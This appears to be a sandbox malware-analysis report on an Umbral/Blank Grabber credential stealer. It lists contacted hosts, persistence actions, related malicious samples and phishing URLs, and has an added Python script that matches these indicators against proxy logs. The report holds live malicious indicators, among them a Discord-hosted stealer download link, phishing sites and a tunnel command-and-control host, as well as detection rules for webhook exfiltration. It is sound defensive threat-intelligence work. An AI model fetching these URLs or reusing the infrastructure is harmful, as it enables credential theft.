http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000006.00000002.2168729014.000001189A7E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2240500054.000001AB15AB8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.discordapp.com/attachments/1277266726186385433/1281762825542303845/Umbral-927537.zip?ex= | Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0? | cert9.db.11.dr | false | Avira URL Cloud: safe | unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL | tmp2887.tmp.tmpdb.11.dr | false | Avira URL Cloud: safe | unknown
https://docs.google.com/presentation/?usp=installed_webapp | Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docs.google.com/presentation/installwebapp?usp=chro0b | Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000006.00000002.2168729014.000001189A5C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2240500054.000001AB15891000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.mozilla.org | tmp2887.tmp.tmpdb.11.dr | false | Avira URL Cloud: safe | unknown
https://docs.google.com/document/?usp=installed_webapp | Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.dr | false | Avira URL Cloud: safe | unknown
http://ip-api.com/json/?fielH | Umbral.exe, 0000000E.00000002.2590100139.000001DCB6688000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ip-api.com/json/?fields=225545 | Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6688000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp, uOWQK.scr.14.dr, Umbral.exe.4.dr | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-AS (US) | true
188.114.97.3 | freegeoip.app | European Union | 13335 | CLOUDFLARENET (US) | true
147.185.221.22 | stage-von.gl.at.ply.gg | United States | 12087 | SALSGIVER (US) | true
104.21.85.189 | ipbase.com | United States | 13335 | CLOUDFLARENET (US) | false
162.159.135.232 | discord.com | United States | 13335 | CLOUDFLARENET (US) | true
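The rows above are raw indicators, and not all of them carry the same weight: ip-api.com, freegeoip.app and discord.com are legitimate services this sample abuses, whereas the *.ply.gg tunnel hostname (playit.gg) has no business on a workstation. The following is an added example, not part of the Joe Sandbox report, that matches the table's domain/IP pairs against proxy log lines and tiers the hits. The indicator values are the ones in the table; the confidence tiers, the log line layout, the sample lines and the Discord webhook path are my own assumptions.

```python
import re
from dataclasses import dataclass

# Indicators copied from the report's IP table (domain -> resolved IP).
REPORT_IOCS = {
    "ip-api.com": "208.95.112.1",
    "freegeoip.app": "188.114.97.3",
    "stage-von.gl.at.ply.gg": "147.185.221.22",
    "ipbase.com": "104.21.85.189",
    "discord.com": "162.159.135.232",
}

# Assumed confidence tiers (not part of the report): the geolocation services and
# discord.com are legitimate sites this sample abuses, so a plain hit there is weak
# on its own; the *.ply.gg (playit.gg) tunnel hostname is the one with no benign use.
BASE_TIER = {
    "stage-von.gl.at.ply.gg": "high",
    "ip-api.com": "low",
    "freegeoip.app": "low",
    "ipbase.com": "low",
    "discord.com": "context",
}

# Reverse index so a bare IP in a CONNECT line maps back to its indicator.
_BY_HOST = {d: d for d in REPORT_IOCS} | {ip: d for d, ip in REPORT_IOCS.items()}

@dataclass(frozen=True)
class Hit:
    line_no: int
    indicator: str   # domain key from REPORT_IOCS
    tier: str
    target: str      # host or IP actually seen in the log line

# Assumed log layout: "<timestamp> <client> <method> <url-or-host:port> <status>"
_LOG_RE = re.compile(r"^(\S+) (\S+) ([A-Z]+) (\S+) (\d{3})$")

def _host_and_path(target):
    """Split 'https://h/p?q', 'h:443' or 'h' into (host, path)."""
    m = re.match(r"^(?:https?://)?([^/:]+)(?::\d+)?(/\S*)?$", target)
    if not m:
        return target.lower(), ""
    return m.group(1).lower(), m.group(2) or ""

def _tier(indicator, path):
    # A POST to a webhook is the usual exfiltration route for Discord-based stealers
    # (assumed path; the report itself only shows discord.com and /api/v10/users/).
    if indicator == "discord.com" and path.startswith("/api/webhooks/"):
        return "high"
    # 'fields=hosting' asks ip-api.com whether the client sits in a data centre, i.e.
    # a sandbox check; treat any 'fields=' lookup there as fingerprinting.
    if indicator == "ip-api.com" and "fields=" in path:
        return "medium"
    return BASE_TIER[indicator]

def scan_proxy_log(lines):
    """Return one Hit per log line whose target is one of the report's indicators."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _LOG_RE.match(line.strip())
        if not m:
            continue                      # unparseable line: skip, never guess
        host, path = _host_and_path(m.group(4))
        indicator = _BY_HOST.get(host)
        if indicator:
            hits.append(Hit(n, indicator, _tier(indicator, path), host))
    return hits

def block_candidates(hits):
    """(domain, ip) pairs safe to block outright: high-tier hits on hosts whose base
    tier is already high. Shared services such as discord.com are left out because a
    domain block breaks legitimate use; handle those by path at the proxy instead."""
    return {(h.indicator, REPORT_IOCS[h.indicator])
            for h in hits if h.tier == "high" and BASE_TIER[h.indicator] == "high"}

# Constructed sample lines, not captured traffic; the paths mirror those in the
# report's URL table except the webhook path, which is assumed.
SAMPLE_LOG = [
    "2024-09-07T01:47:02Z 10.0.0.12 GET http://ip-api.com/line/?fields=hosting 200",
    "2024-09-07T01:47:05Z 10.0.0.12 GET https://www.google.com/ 200",
    "2024-09-07T01:47:09Z 10.0.0.12 GET https://freegeoip.app/xml/ 200",
    "2024-09-07T01:47:40Z 10.0.0.12 CONNECT 147.185.221.22:443 200",
    "2024-09-07T01:47:50Z 10.0.0.12 POST https://discord.com/api/webhooks/1/x 204",
    "2024-09-07T01:48:00Z 10.0.0.12 GET https://discord.com/api/v10/users/@me 200",
]

if __name__ == "__main__":
    found = scan_proxy_log(SAMPLE_LOG)
    for h in found:
        print(f"line {h.line_no}: {h.target:<24} {h.indicator:<24} {h.tier}")
    print("block:", block_candidates(found))
```

The point of the tiers is that a geo-IP lookup alone is not evidence of this sample; the combination of a `fields=hosting` query, a playit.gg tunnel and a Discord webhook POST from one client inside a minute is.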
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1505919
Start date and time: 2024-09-07 01:46:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 47s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 118
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Nursultan.exe
Detection: MAL
Classification: mal100.troj.adwa.spyw.evad.winEXE@155/49@37/5
EGA Information:
• Successful, ratio: 7.4%
HCA Information:
• Successful, ratio: 85%
• Number of executed functions: 293
• Number of non-executed functions: 1
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe, WmiPrvSE.exe
                                      • Excluded IPs from analysis (whitelisted): 142.250.185.163, 142.250.186.67, 142.250.186.163, 142.250.185.227, 216.58.206.35
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target Insidious.exe, PID 7380 because it is empty
                                      • Execution Graph export aborted for target Insidious.exe, PID 7384 because it is empty
                                      • Execution Graph export aborted for target Insidious.exe, PID 7820 because it is empty
                                      • Execution Graph export aborted for target Microsoft Edge.exe, PID 2924 because it is empty
                                      • Execution Graph export aborted for target Microsoft Edge.exe, PID 7440 because it is empty
                                      • Execution Graph export aborted for target Microsoft Edge.exe, PID 7652 because it is empty
                                      • Execution Graph export aborted for target Microsoft Edge.exe, PID 7864 because it is empty
                                      • Execution Graph export aborted for target Nursultan.exe, PID 2464 because it is empty
                                      • Execution Graph export aborted for target Nursultan.exe, PID 528 because it is empty
                                      • Execution Graph export aborted for target Nursultan.exe, PID 576 because it is empty
                                      • Execution Graph export aborted for target Nursultan.exe, PID 7544 because it is empty
                                      • Execution Graph export aborted for target Nursultan.exe, PID 764 because it is empty
                                      • Execution Graph export aborted for target Nursultan.exe, PID 7676 because it is empty
                                      • Execution Graph export aborted for target Nursultan.exe, PID 8092 because it is empty
                                      • Execution Graph export aborted for target Nursultan2.exe, PID 5492 because it is empty
                                      • Execution Graph export aborted for target Nursultan2.exe, PID 7084 because it is empty
                                      • Execution Graph export aborted for target Nursultan2.exe, PID 7404 because it is empty
                                      • Execution Graph export aborted for target Nursultan2.exe, PID 7628 because it is empty
                                      • Execution Graph export aborted for target Nursultan2.exe, PID 8044 because it is empty
                                      • Execution Graph export aborted for target Umbral.exe, PID 2316 because it is empty
                                      • Execution Graph export aborted for target Umbral.exe, PID 7388 because it is empty
                                      • Execution Graph export aborted for target Umbral.exe, PID 7500 because it is empty
                                      • Execution Graph export aborted for target Umbral.exe, PID 7928 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 5748 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 8036 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtOpenFile calls found.
                                      • Report size getting too big, too many NtOpenKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: Nursultan.exe
                                      Time | Type | Description
                                      01:46:47 | Task Scheduler | Run new task: {083F2D61-A183-4DDF-84FC-ECB81CF32D58} path: .
                                      01:47:40 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Edge C:\Users\user\AppData\Roaming\Microsoft Edge
                                      01:47:41 | Task Scheduler | Run new task: Microsoft Edge path: C:\Users\user\AppData\Roaming\Microsoft Edge
                                      01:47:48 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Edge C:\Users\user\AppData\Roaming\Microsoft Edge
                                      01:47:57 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnk
                                      19:47:03 | API Interceptor | 58x Sleep call for process: powershell.exe modified
                                      19:47:04 | API Interceptor | 25x Sleep call for process: Insidious.exe modified
                                      19:47:06 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
                                      19:47:08 | API Interceptor | 705x Sleep call for process: Umbral.exe modified
                                      19:47:39 | API Interceptor | 404596x Sleep call for process: Microsoft Edge.exe modified
                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                      208.95.112.1 | aimbot.exe | Get hash | malicious | XWorm | Browse
                                      • ip-api.com/line/?fields=hosting
                                      | SecuriteInfo.com.BackDoor.SpyBotNET.58.29400.29032.exe | Get hash | malicious | Quasar, Blank Grabber, Njrat, XWorm | Browse
                                      • ip-api.com/json/?fields=225545
                                      | External.exe | Get hash | malicious | Ades Stealer, BlackGuard, VEGA Stealer | Browse
                                      • ip-api.com/json/8.46.123.33
                                      | #U03a4#U0399#U039c#U039f#U039b#U039f#U0393#U0399#U039f Doc_PRG211003417144356060.PDF.exe | Get hash | malicious | AgentTesla | Browse
                                      • ip-api.com/line/?fields=hosting
                                      | Request for Quotation_1.js | Get hash | malicious | PXRECVOWEIWOEI Stealer | Browse
                                      • ip-api.com/line/?fields=hosting
                                      | IDR-500000000.scr.exe | Get hash | malicious | AgentTesla | Browse
                                      • ip-api.com/line/?fields=hosting
                                      | Orden de Compra 4500491659.xlam.xlsx | Get hash | malicious | AgentTesla | Browse
                                      • ip-api.com/line/?fields=hosting
                                      | comprobante.xlam.xlsx | Get hash | malicious | AgentTesla | Browse
                                      • ip-api.com/line/?fields=hosting
                                      | Richiesta-Ordine.jar | Get hash | malicious | Caesium Obfuscator, STRRAT | Browse
                                      • ip-api.com/json/
                                      | XClient.exe | Get hash | malicious | AsyncRAT, XWorm | Browse
                                      • ip-api.com/line/?fields=hosting
                                      188.114.97.3 | 1V8XAuKZqe.exe | Get hash | malicious | FormBook | Browse
                                      • www.bzfowe.shop/q0z8/?Fj=mfqDg&Uj=Ymx9M/wL1uuhleVMwT1bTsfoVYAj22k2bUcsCTdCbG+GVa1MDVCHM501+d2WbKwYM+A/8RrRF4O6L+oKg0W124hvIiTC1IcBNHya+453TUId3R/1zfNk3Cs=
                                      | firmware.armv4l.elf | Get hash | malicious | Unknown | Browse
                                      • 188.114.97.3/
                                      | firmware.armv5l.elf | Get hash | malicious | Unknown | Browse
                                      • 188.114.97.3/
                                      | firmware.armv7l.elf | Get hash | malicious | Unknown | Browse
                                      • 188.114.97.3/
                                      | firmware.i586.elf | Get hash | malicious | Unknown | Browse
                                      • 188.114.97.3/
                                      | firmware.mipsel.elf | Get hash | malicious | Unknown | Browse
                                      • 188.114.97.3/
                                      | firmware.x86_64.elf | Get hash | malicious | Unknown | Browse
                                      • 188.114.97.3/
                                      | PDPUOIE76867 PDF.exe | Get hash | malicious | FormBook | Browse
                                      • www.supergeoet.best/he2a/?5jE=KDPKyQPAHq8c8hx0cOuDUmk6d6xLTnLoeoK3gEa2Ff+kk78wN/0G6PKXvcNGVh7YJCa9&ZN9Ls=9rCTo2P0wPzDj0p
                                      | QUOTATION_SEPQTRA071244#U00faPDF.scr | Get hash | malicious | FormBook | Browse
                                      • filetransfer.io/data-package/76GrdxKp/download
                                      | QUOTATION_SEPQTRA071244#U00faPDF.scr | Get hash | malicious | Unknown | Browse
                                      • filetransfer.io/data-package/76GrdxKp/download
                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                      freegeoip.app | External.exe | Get hash | malicious | Ades Stealer, BlackGuard, VEGA Stealer | Browse
                                      • 188.114.96.3
                                      | Insidious_protected.exe | Get hash | malicious | 44Caliber Stealer, BlackGuard, Rags Stealer | Browse
                                      • 188.114.96.3
                                      | nyen2eabmfb.exe | Get hash | malicious | 44Caliber Stealer, BlackGuard, Rags Stealer | Browse
                                      • 188.114.97.3
                                      | Cheat.exe | Get hash | malicious | 44Caliber Stealer, BlackGuard, Rags Stealer | Browse
                                      • 188.114.97.3
                                      | B5U2ccQ8H1.exe | Get hash | malicious | RL STEALER, StormKitty | Browse
                                      • 188.114.97.3
                                      | xj40xovMsm.exe | Get hash | malicious | AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine | Browse
                                      • 188.114.96.3
                                      | Pots.exe | Get hash | malicious | 44Caliber Stealer, Rags Stealer | Browse
                                      • 104.21.73.97
                                      | qdHMT36Tn9.exe | Get hash | malicious | 44Caliber Stealer, Njrat, Rags Stealer | Browse
                                      • 172.67.160.84
                                      | 64drop.exe | Get hash | malicious | 44Caliber Stealer, Rags Stealer | Browse
                                      • 104.21.73.97
                                      | 123.scr.exe | Get hash | malicious | Unknown | Browse
                                      • 104.21.73.97
                                      discord.com | https://clicker.extremelyorange.com/ | Get hash | malicious | Unknown | Browse
                                      • 162.159.137.232
                                      | R.exe | Get hash | malicious | AsyncRAT, XWorm | Browse
                                      • 162.159.135.232
                                      | TMPN.exe | Get hash | malicious | Skuld Stealer | Browse
                                      • 162.159.128.233
                                      | bkfaf34.exe | Get hash | malicious | Blank Grabber, Umbral Stealer | Browse
                                      • 162.159.128.233
                                      | SolaraBoostrapper.exe | Get hash | malicious | Blank Grabber | Browse
                                      • 162.159.135.232
                                      | vs64.exe | Get hash | malicious | Unknown | Browse
                                      • 162.159.135.232
                                      | 4.7.exe | Get hash | malicious | Unknown | Browse
                                      • 162.159.128.233
                                      | stub.exe | Get hash | malicious | Stealerium | Browse
                                      • 162.159.136.232
                                      | get wifi info temp.exe | Get hash | malicious | Babuk, TrojanRansom | Browse
                                      • 162.159.135.232
                                      | soinjector.exe | Get hash | malicious | Unknown | Browse
                                      • 162.159.128.233
                                      ip-api.com | aimbot.exe | Get hash | malicious | XWorm | Browse
                                      • 208.95.112.1
                                      | SecuriteInfo.com.BackDoor.SpyBotNET.58.29400.29032.exe | Get hash | malicious | Quasar, Blank Grabber, Njrat, XWorm | Browse
                                      • 208.95.112.1
                                      | External.exe | Get hash | malicious | Ades Stealer, BlackGuard, VEGA Stealer | Browse
                                      • 208.95.112.1
                                      | #U03a4#U0399#U039c#U039f#U039b#U039f#U0393#U0399#U039f Doc_PRG211003417144356060.PDF.exe | Get hash | malicious | AgentTesla | Browse
                                      • 208.95.112.1
                                      | Request for Quotation_1.js | Get hash | malicious | PXRECVOWEIWOEI Stealer | Browse
                                      • 208.95.112.1
                                      | IDR-500000000.scr.exe | Get hash | malicious | AgentTesla | Browse
                                      • 208.95.112.1
                                      | Orden de Compra 4500491659.xlam.xlsx | Get hash | malicious | AgentTesla | Browse
                                      • 208.95.112.1
                                      | comprobante.xlam.xlsx | Get hash | malicious | AgentTesla | Browse
                                      • 208.95.112.1
                                      | Richiesta-Ordine.jar | Get hash | malicious | Caesium Obfuscator, STRRAT | Browse
                                      • 208.95.112.1
                                      | XClient.exe | Get hash | malicious | AsyncRAT, XWorm | Browse
                                      • 208.95.112.1
                                      ipbase.com | External.exe | Get hash | malicious | Ades Stealer, BlackGuard, VEGA Stealer | Browse
                                      • 172.67.209.71
                                      | xj40xovMsm.exe | Get hash | malicious | AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine | Browse
                                      • 172.67.209.71
                                      | Pots.exe | Get hash | malicious | 44Caliber Stealer, Rags Stealer | Browse
                                      • 104.21.85.189
                                      | qdHMT36Tn9.exe | Get hash | malicious | 44Caliber Stealer, Njrat, Rags Stealer | Browse
                                      • 172.67.209.71
                                      | 64drop.exe | Get hash | malicious | 44Caliber Stealer, Rags Stealer | Browse
                                      • 104.21.85.189
                                      | 123.scr.exe | Get hash | malicious | Unknown | Browse
                                      • 104.21.85.189
                                      | 123.scr.exe | Get hash | malicious | Rags Stealer | Browse
                                      • 172.67.209.71
                                      | 123.scr.exe | Get hash | malicious | Rags Stealer | Browse
                                      • 172.67.209.71
                                      | RP.sfx.exe | Get hash | malicious | 44Caliber Stealer, Rags Stealer | Browse
                                      • 104.21.85.189
                                      | i6R4NsEd8t.exe | Get hash | malicious | Snake Keylogger | Browse
                                      • 104.21.85.189
                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                      CLOUDFLARENETUS | http://polakijayakrishna.github.io/Netflix-Homepage | Get hash | malicious | HTMLPhisher | Browse
                                      • 172.66.0.227
                                      | https://securemetamaskvallet.webflow.io/ | Get hash | malicious | Unknown | Browse
                                      • 104.18.34.227
                                      | https://ibd.fcs.mybluehost.me/en/RDGDESDZRFSYJNOI/index.php?FGDD=1 | Get hash | malicious | HTMLPhisher | Browse
                                      • 104.17.24.14
                                      | https://contact-page-helper.bond/contract/61559135234072 | Get hash | malicious | Unknown | Browse
                                      • 172.67.74.152
                                      | http://helpdesk-case-review-appeal-id-09875613.d3218g79rs5u78.amplifyapp.com/index.html | Get hash | malicious | Unknown | Browse
                                      • 104.26.4.15
                                      | https://apple-proxy.anwen.workers.dev/ | Get hash | malicious | HTMLPhisher | Browse
                                      • 188.114.96.3
                                      | http://vineethkinik.github.io/Netflix-wesite-frontend | Get hash | malicious | HTMLPhisher | Browse
                                      • 104.18.86.42
                                      | http://buaguhidjn28d.vercel.app/ | Get hash | malicious | Unknown | Browse
                                      • 104.26.13.205
                                      | https://sso--cdn-sub-coinbasepro-auth.webflow.io/ | Get hash | malicious | Unknown | Browse
                                      • 172.64.153.29
                                      | https://sso--cdn--coinbasepro-h-auth.webflow.io/ | Get hash | malicious | Unknown | Browse
                                      • 104.18.34.227
                                      CLOUDFLARENETUS | http://polakijayakrishna.github.io/Netflix-Homepage | Get hash | malicious | HTMLPhisher | Browse
                                      • 172.66.0.227
                                      | https://securemetamaskvallet.webflow.io/ | Get hash | malicious | Unknown | Browse
                                      • 104.18.34.227
                                      | https://ibd.fcs.mybluehost.me/en/RDGDESDZRFSYJNOI/index.php?FGDD=1 | Get hash | malicious | HTMLPhisher | Browse
                                      • 104.17.24.14
                                      | https://contact-page-helper.bond/contract/61559135234072 | Get hash | malicious | Unknown | Browse
                                      • 172.67.74.152
                                      | http://helpdesk-case-review-appeal-id-09875613.d3218g79rs5u78.amplifyapp.com/index.html | Get hash | malicious | Unknown | Browse
                                      • 104.26.4.15
                                      | https://apple-proxy.anwen.workers.dev/ | Get hash | malicious | HTMLPhisher | Browse
                                      • 188.114.96.3
                                      | http://vineethkinik.github.io/Netflix-wesite-frontend | Get hash | malicious | HTMLPhisher | Browse
                                      • 104.18.86.42
                                      | http://buaguhidjn28d.vercel.app/ | Get hash | malicious | Unknown | Browse
                                      • 104.26.13.205
                                      | https://sso--cdn-sub-coinbasepro-auth.webflow.io/ | Get hash | malicious | Unknown | Browse
                                      • 172.64.153.29
                                      | https://sso--cdn--coinbasepro-h-auth.webflow.io/ | Get hash | malicious | Unknown | Browse
                                      • 104.18.34.227
                                      TUT-ASUS | aimbot.exe | Get hash | malicious | XWorm | Browse
                                      • 208.95.112.1
                                      | SecuriteInfo.com.BackDoor.SpyBotNET.58.29400.29032.exe | Get hash | malicious | Quasar, Blank Grabber, Njrat, XWorm | Browse
                                      • 208.95.112.1
                                      | External.exe | Get hash | malicious | Ades Stealer, BlackGuard, VEGA Stealer | Browse
                                      • 208.95.112.1
                                      | #U03a4#U0399#U039c#U039f#U039b#U039f#U0393#U0399#U039f Doc_PRG211003417144356060.PDF.exe | Get hash | malicious | AgentTesla | Browse
                                      • 208.95.112.1
                                      | Request for Quotation_1.js | Get hash | malicious | PXRECVOWEIWOEI Stealer | Browse
                                      • 208.95.112.1
                                      | IDR-500000000.scr.exe | Get hash | malicious | AgentTesla | Browse
                                      • 208.95.112.1
                                      | Orden de Compra 4500491659.xlam.xlsx | Get hash | malicious | AgentTesla | Browse
                                      • 208.95.112.1
                                      | comprobante.xlam.xlsx | Get hash | malicious | AgentTesla | Browse
                                      • 208.95.112.1
                                      | Richiesta-Ordine.jar | Get hash | malicious | Caesium Obfuscator, STRRAT | Browse
                                      • 208.95.112.1
                                      | XClient.exe | Get hash | malicious | AsyncRAT, XWorm | Browse
                                      • 208.95.112.1
                                      SALSGIVERUS | aimbot.exe | Get hash | malicious | XWorm | Browse
                                      • 147.185.221.22
                                      | Launcher.exe | Get hash | malicious | Unknown | Browse
                                      • 147.185.221.22
                                      | Launcher.exe | Get hash | malicious | Unknown | Browse
                                      • 147.185.221.22
                                      | Server.exe | Get hash | malicious | Unknown | Browse
                                      • 147.185.221.19
                                      | Hoodbyunlock.exe | Get hash | malicious | XWorm | Browse
                                      • 147.185.221.17
                                      | x.exe | Get hash | malicious | XWorm | Browse
                                      • 147.185.221.17
                                      | silverclient.exe | Get hash | malicious | Unknown | Browse
                                      • 147.185.221.22
                                      | XClient.exe | Get hash | malicious | XWorm | Browse
                                      • 147.185.221.20
                                      | JFhDGHXmW6.exe | Get hash | malicious | Unknown | Browse
                                      • 147.185.221.21
                                      | Stub.exe | Get hash | malicious | Unknown | Browse
                                      • 147.185.221.22
                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                      3b5074b1b5d032e5620f69f9f700ff0e | https://securemetamaskvallet.webflow.io/ | Get hash | malicious | Unknown | Browse
                                      • 104.21.85.189
                                      • 188.114.97.3
                                      • 162.159.135.232
                                      | https://helpercenter.freewebhostmost.com/ | Get hash | malicious | Unknown | Browse
                                      • 104.21.85.189
                                      • 188.114.97.3
                                      • 162.159.135.232
                                      | https://qrco.de/bfN4CG?akutaktaauapayangkauberikan= | Get hash | malicious | Unknown | Browse
                                      • 104.21.85.189
                                      • 188.114.97.3
                                      • 162.159.135.232
                                      | Canon_Scan_239.pdf | Get hash | malicious | Unknown | Browse
                                      • 104.21.85.189
                                      • 188.114.97.3
                                      • 162.159.135.232
                                      | https://conectetwallet.gitbook.io/us | Get hash | malicious | Unknown | Browse
                                      • 104.21.85.189
                                      • 188.114.97.3
                                      • 162.159.135.232
                                      | https://quickpay-arabian.com/ | Get hash | malicious | Unknown | Browse
                                      • 104.21.85.189
                                      • 188.114.97.3
                                      • 162.159.135.232
                                      | https://re6856-sdo324d.pages.dev/robots.txt/ | Get hash | malicious | Unknown | Browse
                                      • 104.21.85.189
                                      • 188.114.97.3
                                      • 162.159.135.232
                                      | https://ssomtamask-wallet.webflow.io/ | Get hash | malicious | Unknown | Browse
                                      • 104.21.85.189
                                      • 188.114.97.3
                                      • 162.159.135.232
                                      | http://pub-5318ffd0fada44dd97326dbd4ce89ac7.r2.dev/index.html?err=0hwpvszsztyyi3a3wwxr3dbsljnuegcted78srz6pch8mrfi6qj701oydhbgif0tjk2yc2s3u5ksnrkarlbt90hruunhdazok4db3d8bbwy9w72pdd9jweauy4zjnbezzsmzsb67ioik7ahov3fh95b7eqki99kjpi65xjcm9n1pmrz3cajnkq2nxbqqviqizc4hvlthzyipni71qo5q6ukevq8dzlbuzm2ourvw&dispatch=3h8aj8gc26f87d4702h445a0fg3id2&id=38i1c29ihb65ggci7k43afdhdae09f85e92j055gj9ja8 | Get hash | malicious | HTMLPhisher | Browse
                                      • 104.21.85.189
                                      • 188.114.97.3
                                      • 162.159.135.232
                                      | https://la-ips.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVEyOXBaR009JnVpZD1VU0VSMjkwODIwMjRVMTEwODI5MzY=N0123Njwarren@arrivesdaa.com | Get hash | malicious | Unknown | Browse
                                      • 104.21.85.189
                                      • 188.114.97.3
                                      • 162.159.135.232
                                      No context
                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):236544
                                      Entropy (8bit):6.080049516389128
                                      Encrypted:false
                                      SSDEEP:6144:xloZM+rIkd8g+EtXHkv/iD4YD+rmkrHMs9YW3X2TFb8e1m9H4i:DoZtL+EP8YD+rmkrHMs9YW3X25IHB
                                      MD5:DF69E1468A4656F2EEC526DE59A89A8B
                                      SHA1:E65E192BE57CD672B8EF19CD72AD89CBD3F8F60A
                                      SHA-256:4D3A9636E9D29F227B56D7BF140154384E1F426B69CF213AE46115E8D966AA92
                                      SHA-512:409DCA3F4CE130034B3004726939A59F38939D46E09F04D6C8A77EA20E3FF931D1A7332F00C06C3E46D8C64796AC93299C2F5A6595777F3E05CF89BC0522449F
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 92%
